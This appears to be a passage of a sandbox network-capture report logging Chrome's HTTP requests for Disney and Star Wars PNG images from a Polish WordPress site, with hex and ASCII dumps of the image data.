                                                            108192.168.2.1649826178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:05 UTC404OUTGET /wp-content/uploads/2015/07/StarWars.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:06 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:06 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:25 GMT
                                                            ETag: "2b83-620a8b51819a8"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 11139
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:06 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 50 00 00 01 00 08 06 00 00 00 7c 84 48 2f 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 0a 4f 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 67 54 53 e9 16 3d f7 de f4 42 4b 88 80 94 4b 6f 52 15 08 20 52 42 8b 80 14 91 26 2a 21 09 10 4a 88 21 a1 d9 15 51 c1 11 45 45 04 1b c8 a0 88 03 8e 8e 80 8c 15 51 2c 0c 8a 0a d8 07 e4 21 a2 8e 83 a3 88 8a ca fb e1 7b a3 6b d6 bc f7 e6 cd fe b5 d7 3e e7 ac f3 9d b3 cf 07 c0 08 0c 96 48 33 51 35 80 0c a9 42 1e 11 e0 83 c7 c4 c6 e1 e4 2e 40 81 0a 24 70 00 10 08 b3 64 21 73 fd 23 01 00 f8 7e 3c 3c 2b 22 c0 07 be 00 01 78 d3 0b 08 00 c0 4d 9b c0 30 1c 87 ff 0f ea 42 99 5c 01 80 84 01 c0 74 91 38 4b
                                                            Data Ascii: PNGIHDRP|H/pHYs.#.#x?vOiCCPPhotoshop ICC profilexSgTS=BKKoR RB&*!J!QEEQ,!{k>H3Q5B.@$pd!s#~<<+"xM0B\t8K
                                                            2025-01-15 10:08:06 UTC3204INData Raw: da 61 65 4c f1 a0 b0 d3 7a 2f ec b1 4c 0e 6b 87 d6 98 82 40 fc a4 93 71 93 7d 92 b2 3c e5 a1 85 58 38 da e3 77 ee a8 07 10 c3 88 27 c0 e5 c1 8d e2 78 b4 cf fe 57 13 0d c5 39 69 69 50 35 10 09 d9 66 25 fc 9e b3 3c b9 bc 8f 40 b5 02 10 8f 30 f8 44 f3 fe a7 6f 6e d4 bf 16 7d 53 e9 0b ee 09 83 d4 05 2a c0 80 2f 26 6a 63 8a ec b6 f7 1c ed 51 08 d6 92 c6 e5 c2 a0 9b 10 d9 c7 6b a5 b1 78 7e 17 60 a7 f0 3b 34 14 69 c8 80 94 25 ea 3c 37 89 3a da f3 f7 5a ea 01 cc 8c 6f 49 d0 dc 81 3f af 8f 1a 97 d9 49 67 90 26 35 21 08 da 6e 21 51 0a 05 8a 7d 50 30 ab 30 04 c8 5e ad 7e f9 ee 07 6e a9 60 ad ec 3b 70 b9 70 62 18 53 68 1c 94 ac a6 ac ab 09 4b d4 35 02 f5 0a ae 81 ee 05 60 1e 42 e4 23 d3 3c 52 6e 13 19 e9 36 14 ed a4 50 77 e2 6c 82 6b 85 ba 4c de fd 47 63 8a 73 04 6a
                                                            Data Ascii: aeLz/Lk@q}<X8w'xW9iiP5f%<@0Don}S*/&jcQkx~`;4i%<7:ZoI?Ig&5!n!Q}P00^~n`;ppbShK5`B#<Rn6PwlkLGcsj


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            109192.168.2.1649827178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:06 UTC657OUTGET /wp-content/uploads/2015/07/disney_captain_jackie.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:06 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:06 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:19 GMT
                                                            ETag: "a9eb-620a8b4c7a857"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 43499
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:06 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 00 72 7c 88 ab 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 07 74 49 4d 45 07 e1 02 1c 15 34 34 f1 b0 bf 19 00 00 20 00 49 44 41 54 78 da ec bd 59 8c 65 f7 7d e7 f7 f9 6f 67 b9 6b dd da ba bb 7a ef a6 48 91 12 a9 85 54 2c d9 a2 2d db e3 75 96 cc 18 09 02 04 01 92 3c 24 f0 43 10 bf 64 f2 18 cc e4 39 2f 59 91 e5 21 08 10 04 08 02 8c 67 06 1e db 93 b1 0d cb c6 c8 5a 48 4a dc 9a 64 b3 f7 ea da ab ee 7e ef d9 fe 4b 1e ce 6d 8a 12 a4 b1 62 8b f4 76 3e 40 a1 80 aa ba f7 9e fb af fb ff 9e df fe 87 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86 86
                                                            Data Ascii: PNGIHDR,r|bKGDpHYs.#.#x?vtIME44 IDATxYe}ogkzHT,-u<$Cd9/Y!gZHJd~Kmbv>@
                                                            2025-01-15 10:08:06 UTC8000INData Raw: 41 5a 41 22 75 3d ce 2f d4 73 ad c4 93 59 ed 61 15 0f 5a b9 88 d6 3b 2a ad 68 ef 0c b8 78 75 8d 41 b6 a4 7c e3 31 87 87 67 dc 4c 07 f4 a3 0e 76 39 47 96 05 c6 7b 54 00 f1 c1 4c f6 d5 e0 bf 10 56 2d 8f 4f dc d0 ba 15 8b e0 10 42 ac c4 cb e1 7d dd 13 a8 a3 08 13 c7 8c 46 13 16 8b ec 83 64 4c 5d 87 a5 3e 98 a3 a5 75 7d b3 43 aa c6 ca 6a 04 eb e3 c1 56 f5 c4 4c 67 6d 2d 58 a1 6e 79 51 4a d4 9b 49 28 bc 0f 58 5b e1 82 c5 3f 99 ff 1e c4 aa 4a 5a e2 42 c0 7a 20 4e 08 78 86 d3 21 cb 49 46 5a 06 d2 c2 13 97 1e e3 ea 02 d5 65 b0 9c 84 29 dd 6b cf f0 f2 df fd 59 ce 5d 3d 87 9d 8f 39 3e 3d c0 c4 11 9d 4e 8f 1b 4f 5d e1 67 7f e5 8b 54 ba 60 e7 c2 79 b2 bc c4 4f a6 e8 d1 9c f5 a0 f8 dc f9 1b 64 91 40 4e 2a ec a2 ac af 59 09 12 ad 88 5d 60 76 78 cc 72 e7 8c b6 8e d0 4a
                                                            Data Ascii: AZA"u=/sYaZ;*hxuA|1gLv9G{TLV-OB}FdL]>u}CjVLgm-XnyQJI(X[?JZBz Nx!IFZe)kY]=9>=NO]gT`yOd@N*Y]`vxrJ
                                                            2025-01-15 10:08:06 UTC8000INData Raw: a2 6e 10 97 3d 86 fb 3d 06 bd 21 54 d5 14 d7 63 c2 c2 63 ba a1 f5 5e 20 a3 88 ba ca 39 9c 0c f8 62 7c c4 26 63 0c d0 21 66 41 67 b8 96 c6 ce 44 74 97 66 99 5b 5a 62 76 76 0e 25 3d cd 46 42 bb d3 64 79 79 1e 8f 23 8b 13 1e 3e da 60 7b 67 87 73 67 cf 30 37 d3 26 d2 27 98 ec f0 e2 12 52 a2 b5 0e 73 2a 1d a1 84 c4 9a 1a 6f 2a 84 0c b4 d8 24 4d 20 f7 a7 78 99 d3 82 f5 ff 57 d5 f2 cf 5a 80 30 75 75 38 63 42 72 8c 20 28 9c 95 0a 74 07 17 06 da 35 9e fe 70 80 54 82 6e a7 8d d6 12 6f 83 6a ba c8 27 0c 07 43 d2 2c 23 4d 52 94 94 d8 aa a2 ae 4b 44 9a a1 23 8d 54 92 ba 32 e1 e6 45 31 a6 aa 30 65 45 24 13 92 28 82 4a 71 ef c3 cf b9 ff d9 7d c6 07 7d 8e 0f 8e 28 f2 09 59 23 e2 fa 4b 37 78 fd cd ef 92 8a 84 4c 25 c8 93 4a 2a bf 7a d9 fb 69 12 b5 90 8a 46 da 22 56 29 be
                                                            Data Ascii: n==!Tcc^ 9b|&c!fAgDtf[Zbvv%=FBdyy#>`{gsg07&'Rs*o*$M xWZ0uu8cBr (t5pTnoj'C,#MRKD#T2E10eE$(Jq}}(Y#K7xL%J*ziF"V)
                                                            2025-01-15 10:08:06 UTC8000INData Raw: 7c f4 c1 23 9e 6c 6e d3 6e 78 ce 9f bb c0 4c fb 0c bf fa c5 27 8c 7a 39 55 3e 46 4e 11 c7 e2 6b c2 e1 13 1d d6 64 32 c1 18 8b 9c b2 cc b4 8e 50 2a 0a c1 14 c6 9c ce b0 4e 0b d6 73 59 0f 3e b3 5a 38 ef 42 c4 44 30 16 06 6d d5 49 1a b4 b3 e4 75 c5 68 3c 20 2f c6 44 cd 78 6a 62 0e ba a4 24 e9 a0 75 83 a2 ac 68 34 60 71 21 66 fd 8c e4 f0 08 b6 b6 72 f2 22 c7 7a d8 7c 0c 55 0d 2b ca f3 f4 c9 01 e3 e1 90 46 02 2f bf b0 cc ad cb eb 74 74 cd 4f 7f b5 c9 6f 3e b8 43 ab 9d 72 ed fc 59 1a 89 23 4d 0c 42 d4 54 95 a5 ac c1 0b 4f b7 9b a2 94 e7 d1 83 7d de 7d e7 31 87 07 8e 2b d7 52 bc 6c d1 3b ce 51 ca 12 e9 8a aa 1c 30 37 ab 58 5b 85 8d a7 d0 6a cd f0 cd 57 5f 64 69 46 93 0f fa 24 51 8c a4 42 09 41 12 79 c6 83 63 9e 3c 7d c8 83 87 b0 b3 13 22 13 97 56 23 5e be 72 89
                                                            Data Ascii: |#lnnxL'z9U>FNkd2P*NsY>Z8BD0mIuh< /Dxjb$uh4`q!fr"z|U+F/ttOo>CrY#MBTO}}1+Rl;Q07X[jW_diF$QBAyc<}"V#^r
                                                            2025-01-15 10:08:06 UTC8000INData Raw: 6f 32 21 cb 52 b6 77 f7 48 e6 29 38 12 25 2d 4a 40 26 4b 76 0e b6 f1 f6 22 56 b6 96 70 dc 18 e3 80 c1 d2 e9 76 89 e2 26 1b 6b eb 9c 1e ef 73 7c b8 43 99 e7 8c 4e 87 0c 47 63 e2 56 87 66 b3 4b 18 b6 70 3c bf 1e 40 ab 8c d8 f7 18 74 4b 96 16 7d 5e bf b9 c5 b5 2b 17 78 f8 64 4a 92 65 9c 8c 4e b9 bc d1 e6 2f ff e4 f7 58 e8 78 ec ec 9d f2 8f 1f bf 64 f7 e8 88 d0 1b 60 75 4e 3a 4f b8 f7 60 4c c9 02 b7 de b9 c1 9d a7 3b 1c 9c 4e 79 f5 b5 1b 7c 78 9a f1 c5 97 5f e0 bf da e2 da b5 55 de 7c fd 0a 8f 9f 1d 52 94 75 25 76 65 bd 4b 91 4c 58 68 54 6c 5c 0c d9 7a 73 8b 66 cb 25 9d 8c f9 f4 ee 0b 9a 1d 97 f5 cd 26 87 47 23 ee df 2f f9 ec 4b 58 da ba c8 2b 2b 0d 3e f9 f5 03 ca 32 61 7a 72 44 32 d9 e7 d1 dd 23 ee 3f 84 02 58 be e0 f2 d6 7b b7 78 ef 3b ef 72 e5 f2 3a c3 e3
                                                            Data Ascii: o2!RwH)8%-J@&Kv"Vpv&ks|CNGcVfKp<@tK}^+xdJeN/Xxd`uN:O`L;Ny|x_U|Ru%veKLXhTl\zsf%&G#/KX++>2azrD2#?X{x;r:
                                                            2025-01-15 10:08:06 UTC3564INData Raw: 7b 3b db ec ec 6c b1 fc d6 05 6a b3 cb 94 01 59 e5 2c 72 f1 23 6a 86 95 fa 22 2b ef 67 c5 47 41 04 32 e2 2b 59 25 1d 61 9d 7a 9e de e1 58 f4 fb fd 8f b6 b7 b7 7e f3 f6 db 57 ca 8e 96 61 b2 11 49 af 43 3a 78 8a d0 31 8f ee ff 33 f7 ee fe 81 3c 2f a6 d8 3d 15 70 f5 ea 7b 5c ba 7c 05 19 55 e8 f5 87 74 9e 6c d3 e9 74 69 2f bc c5 cd 1f fe 04 8b 22 8e 63 c2 b0 52 14 e8 4c 92 22 15 0d 94 59 00 4d 51 7a 4a 88 72 1d b5 29 b5 9e 45 58 83 c9 52 6c 6e 90 61 85 a0 3e 43 58 9b 21 ee 0f 99 8c 13 a4 1f 10 56 6b 84 d5 08 44 11 3c 99 c4 e3 32 22 de 47 08 55 46 9a 3f 97 50 ce 94 ca 03 5b 3a bc 75 99 39 35 c3 5a cd b3 4c 99 d6 16 a9 73 ca ff 8b dc 5f c5 f6 85 1a 52 20 3c 82 4a 95 4a a5 5a 94 69 d7 39 b5 5a 0d a1 04 3a cb 18 f6 fa 48 e5 53 6b cd 22 fd 80 67 f9 24 f7 af 61 3f
                                                            Data Ascii: {;ljY,r#j"+gGA2+Y%azX~WaIC:x13</=p{\|Utlti/"cRL"YMQzJr)EXRlna>CX!VkD<2"GUF?P[:u95ZLs_R <JJZi9Z:HSk"g$a?


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            110192.168.2.1649828178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:06 UTC414OUTGET /wp-content/uploads/2015/07/disney_zootropolis.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:06 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:06 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:20 GMT
                                                            ETag: "32f3-620a8b4d18b8a"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 13043
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:06 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 00 72 7c 88 ab 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 07 74 49 4d 45 07 e1 02 1c 15 36 22 37 52 68 ca 00 00 20 00 49 44 41 54 78 da ed bd 67 94 1d d7 75 a0 fb 9d 8a 37 df ce 68 34 80 6e 44 02 44 60 84 18 c5 24 89 a4 48 4a d4 48 94 34 b2 2d 5b c9 e3 e5 79 23 87 b1 ac 99 e5 37 b6 9e c3 bc e4 d1 8c 9f e3 f2 b3 f5 46 96 64 45 cb 4a b6 44 51 14 49 31 8b 01 00 29 90 40 23 b1 23 1a e8 dc 7d f3 ad 70 ce fb 71 6f 83 00 85 d0 88 4c fb 5b eb 02 bd ba 6f a8 da b7 ea ab bd 4f ed 3a 05 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08 82 20 08
                                                            Data Ascii: PNGIHDR,r|bKGDpHYs.#.#x?vtIME6"7Rh IDATxgu7h4nDD`$HJH4-[y#7FdEJDQI1)@##}pqoL[oO:
                                                            2025-01-15 10:08:06 UTC5108INData Raw: 58 f9 44 a6 91 49 35 ce 7a b9 38 26 83 1b b4 a0 a3 18 15 25 71 51 2c f3 53 fc ed af fc 1e bf f3 a5 bf a1 54 2f 91 b9 ac 95 7a 47 85 2f 1f fc 0e e1 d2 0a ef b0 ae a2 95 04 ef dc 74 39 81 4e f2 97 df f9 1c ad 6f 5d 82 6e 81 38 69 b1 30 63 8c 5b d0 64 ea 36 e1 ae 2a ad c3 29 fe 8f 5f fe 14 ed b8 84 68 8c 72 50 2a 49 84 dd 6c de ac b3 2c dd 49 6f 32 0d d9 a5 0b 0d e8 60 2d cc b4 d0 b0 bf 67 e0 77 6f fd 00 e1 f7 2d 7e f2 c0 33 74 5c b2 94 5a 3a 40 79 36 d8 0a 27 30 24 0a 1a af 6c 33 bf 63 8e 77 a5 df ce a7 6e bf 1b 6d 0c be f2 c9 97 bb 69 0f 15 25 3f 00 13 33 a9 23 50 1a 15 59 14 c6 27 b9 be e7 26 66 47 66 99 bc 77 1a b7 d5 63 ba 0e 5d f7 74 13 6f b7 e8 dc ba 8c f9 7c 81 03 c5 01 f6 74 f7 d3 a2 b6 e0 93 a6 d6 9c 35 75 82 49 1e aa 3c c3 ae fa 28 4e b2 95 c4 64
                                                            Data Ascii: XDI5z8&%qQ,ST/zG/t9No]n8i0c[d6*)_hrP*Il,Io2`-gwo-~3t\Z:@y6'0$l3cwnmi%?3#PY'&fGfwc]to|t5uI<(Nd


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            111192.168.2.1649829178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:06 UTC655OUTGET /wp-content/uploads/2015/07/disney_mickey_mouse.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:06 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:06 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:11 GMT
                                                            ETag: "59be-620a8b449ce45"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 22974
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:06 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 00 72 7c 88 ab 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 07 74 49 4d 45 07 e1 02 1c 16 0c 20 fe b3 69 c6 00 00 20 00 49 44 41 54 78 da ec bd 79 94 5d 57 75 e7 ff 39 e7 0e 6f ae 57 73 95 4a f3 64 c9 92 e5 49 9e 6d 62 c0 36 83 cd 90 30 84 90 10 48 9a 0e a1 d3 e9 90 ee 5f f3 eb 64 a5 7f 49 08 49 3a bd 92 0e 81 40 87 84 4e 48 02 21 4c 01 0c 06 8c 0d 36 d8 b2 6c cb b2 d0 58 9a 4a 52 0d aa 79 7a f3 7d 77 38 e7 fc fe 78 55 65 c9 43 3a 0c 36 26 39 9f b5 de 92 56 bd e1 de b7 df 3d df bb f7 3e fb ec 03 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1
                                                            Data Ascii: PNGIHDR,r|bKGDpHYs.#.#x?vtIME i IDATxy]Wu9oWsJdImb60H_dII:@NH!L6lXJRyz}w8xUeC:6&9V=>bX,bX,bX,bX,b
                                                            2025-01-15 10:08:06 UTC8000INData Raw: ad 3f 8f 4c 15 5b 02 a6 43 48 ea 90 d4 68 d4 16 49 e5 57 d3 c8 ae 62 5f a5 c4 a0 49 98 12 9a 05 0c 0d 29 08 a4 20 30 9a 5c a2 e8 9a 5f e4 3c 53 fc fc 96 6d 80 42 a1 31 28 b4 d0 e8 56 b5 14 2e 29 04 ee 92 4f 63 50 44 cc 34 27 69 7a 15 22 d9 c0 18 85 94 92 b1 c9 29 7a f3 ab d9 51 b8 02 07 0f 9e e6 33 99 8b 72 f4 4f 79 9d cb 5d 2c 5a 56 7c e6 c0 5e d4 b0 bf bc c8 a2 23 49 39 82 0e c7 85 b9 05 76 f5 f7 b1 c6 4d ad fc 06 e6 69 12 29 31 68 42 e6 f4 14 f3 72 9c 93 c1 01 ce 47 43 d4 59 44 0b 45 9a 3c c5 b8 8f 75 e6 52 ae eb be 15 49 07 82 74 ab 47 98 11 ad 90 f3 e9 bf c5 ca 91 96 bf 89 b3 f4 68 75 71 c8 e7 f3 f4 f7 f7 73 f0 e0 41 b2 b9 2c eb d6 ae 59 ba 56 ac 60 59 c1 7a e1 43 45 52 a9 d4 33 66 7c 62 60 38 0a 99 f2 25 e7 3c cd 48 d0 20 96 82 64 f4 3c dd 43 c3 fc
                                                            Data Ascii: ?L[CHhIWb_I) 0\_<SmB1(V.)OcPD4'iz")zQ3rOy],ZV|^#I9vMi)1hBrGCYDE<uRItGhuqsA,YV`YzCER3f|b`8%<H d<C
                                                            2025-01-15 10:08:06 UTC7039INData Raw: 10 33 52 08 4d 32 f9 e9 7f c9 9b 27 cf f0 87 7f f1 23 26 0f 44 18 ec 8f e1 7b 3e 8b cb 1b cc 2e ac 33 bd a0 d3 4c 7f 98 8f fd f2 6f 31 7a e4 18 a6 68 2d 82 f5 e4 be 61 a6 5e fd 01 f6 c6 3a 19 3b 42 2e 96 e0 d0 d1 87 39 3c 3c c2 d8 e0 10 fb f6 ed eb 26 c7 b6 6c 0f 9d 98 d6 43 6f 38 80 bf 60 73 b9 b8 c4 da d9 3c b5 e9 08 75 a7 8e ef fa 44 cc 18 57 de c8 73 5e bf 46 a2 3f 41 79 26 c0 0c a2 18 b1 1e 7e f3 df ff 47 e2 fd c3 bc fd fd bf e1 72 7e 9e cb 9b 9b 68 b5 2a 06 60 b5 5f 02 da 53 6b da b5 d8 4d 0b e2 31 ac de 3e fa 8e 1c e6 f0 e4 24 c3 0f 3f cc 70 2c c5 27 7b b2 fc cf af ff 05 b9 13 4f 92 1a 1a 42 d8 36 32 08 08 36 ab ac cc 5c 61 fd 95 d7 18 5d 2b f0 d5 e3 4f 71 fc c1 c9 ee 74 a8 21 67 98 7f f2 f4 bf e0 a1 c1 0f f3 bd b7 5e e0 8d 8b af 73 ed dc 0a 81 f0
                                                            Data Ascii: 3RM2'#&D{>.3Lo1zh-a^:;B.9<<&lCo8`s<uDWs^F?Ay&~Gr~h*`_SkM1>$?p,'{OB626\a]+Oqt!g^s


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            112192.168.2.1649830178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:06 UTC418OUTGET /wp-content/uploads/2015/07/disney_winnie_the_pooh.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:06 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:06 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:14 GMT
                                                            ETag: "7825-620a8b4732fcc"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 30757
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:06 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 00 72 7c 88 ab 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 07 74 49 4d 45 07 e1 02 1c 15 37 3a 3d 25 c1 dd 00 00 20 00 49 44 41 54 78 da ec bd d7 8f 64 57 9e e7 f7 39 e7 5c 1b de a4 77 e5 59 64 91 6c 76 d3 75 f7 76 ef 18 0d b0 1a ec c3 00 02 f4 24 08 d0 93 80 79 10 a4 17 ad f4 26 ec ea 3f 90 03 04 e8 49 80 a0 07 99 87 85 a0 c1 4a b3 9a dd 31 cd e1 d0 b3 c9 f2 2e 33 2b 7d 46 46 86 8f b8 ee 1c 3d dc a8 ac 64 b1 8a ec 66 d3 56 9f 4f 31 58 26 22 6e dc 3c 79 ef 37 7f bf df f9 19 b0 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b
                                                            Data Ascii: PNGIHDR,r|bKGDpHYs.#.#x?vtIME7:=% IDATxdW9\wYdlvuv$y&?IJ1.3+}FF=dfVO1X&"n<y7X,bX,bX,bX,bX,bX,
                                                            2025-01-15 10:08:06 UTC8000INData Raw: 23 55 1e b3 cf b2 dc e2 99 5a 1b 52 49 a4 90 79 66 86 d6 e8 69 5a 46 be d3 e8 a0 1e a6 51 4c 83 e6 d9 49 5a c7 54 fe 8d 41 6b 73 12 27 54 6a 9a 07 36 4d ae cd b4 66 38 ec 93 a5 09 95 5a 0d d7 c9 07 53 f4 0f 0f b8 f6 fe 7b dc bb fa 09 93 a3 43 92 41 46 df ec 70 ff ea a7 54 17 96 b9 30 b7 4a b9 b9 84 ef e5 9f 3f 18 0c f1 5c 37 ef c8 e1 7e c9 ad 21 7e 13 cb f0 8b f9 6c 6a 88 c5 0a d6 b7 67 67 a1 b5 21 4d 53 3c 9d e7 0d 54 67 e6 79 f9 cd 7f c4 d9 85 25 8e ce 5d e0 e8 e6 4d 8e 6e de e2 e8 fa 6d a2 9d 03 7c 2d f0 91 08 43 1e 6b 51 0e 17 ce 9e e5 67 7f f8 07 38 2f 3e 0f b5 1a 73 b5 26 73 73 cb 2c 2c 9f 63 73 e6 63 d6 c5 db 0c d6 37 51 a3 09 5e 92 e1 21 11 3a 43 4b 87 95 b9 05 ce 5d 79 91 b5 9f fd 0c e7 85 97 20 ac c0 49 a2 2a 80 24 a8 d4 08 2e 5c 62 ae 52 e5 b9
                                                            Data Ascii: #UZRIyfiZFQLIZTAks'Tj6Mf8ZS{CAFpT0J?\7~!~ljgg!MS<Tgy%]Mnm|-CkQg8/>s&ss,,csc7Q^!:CK]y I*$.\bR
